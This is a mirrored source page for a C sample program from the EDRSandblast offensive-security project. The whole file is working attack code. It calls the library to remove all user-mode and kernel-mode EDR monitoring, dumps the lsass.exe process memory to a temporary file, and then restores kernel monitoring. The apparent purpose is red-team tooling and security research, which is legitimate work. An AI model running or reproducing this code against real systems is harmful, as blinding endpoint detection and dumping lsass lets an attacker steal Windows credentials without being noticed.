Mirrors/wavestone-cdt-edrsandblast
1
0
Fork 0
mirror of https://github.com/wavestone-cdt/EDRSandblast.git synced 2026-06-08 16:37:12 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
master
wavestone-cdt-edrsandblast/EDRSandblast_LsassDump/EDRSandblast_LsassDump.c
T
Maxime Meignan fe4ab633da Ensure retrocompatibility with Windows XP->Windows 7 
Replaced PathCch* function with Path* functions
2022-11-15 16:05:05 +01:00

31 lines
1011 B
C
Raw Permalink Blame History

#include "../EDRSandblast_StaticLibrary/EDRSandblast_API.h"
#include <stdio.h>
#pragma comment(lib, "Dbghelp.lib")
#pragma comment(lib, "Version.lib")
#pragma comment(lib, "Winhttp.lib")
#pragma comment(lib, "EDRSandblast_Core.lib")
#pragma comment(lib, "EDRSandblast_StaticLibrary.lib")
#pragma comment(lib, "Shlwapi.lib")
int main()
{
EDRSB_CONTEXT ctx = { 0 };
EDRSB_CONFIG cfg = { 0 };
cfg.bypassMode.Usermode = TRUE;
cfg.bypassMode.Krnlmode = TRUE;
cfg.offsetRetrievalMethod.Internet = TRUE;
cfg.offsetRetrievalMethod.File = TRUE;
EDRSB_STATUS status;
if (status = EDRSB_Init(&ctx, &cfg) != EDRSB_SUCCESS) {
printf("EDRSB_Init: %u", status);
}
Usermode_RemoveAllMonitoring(&ctx, EDRSB_UMTECH_Find_and_use_existing_trampoline);
Krnlmode_RemoveAllMonitoring(&ctx);
Action_DumpProcessByName(&ctx, L"lsass.exe", L"C:\\temp\\tmp.tmp", EDRSB_UMTECH_Find_and_use_existing_trampoline);
Krnlmode_RestoreAllMonitoring(&ctx);
EDRSB_CleanUp(&ctx);
}
Reference in New Issue View Git Blame Copy Permalink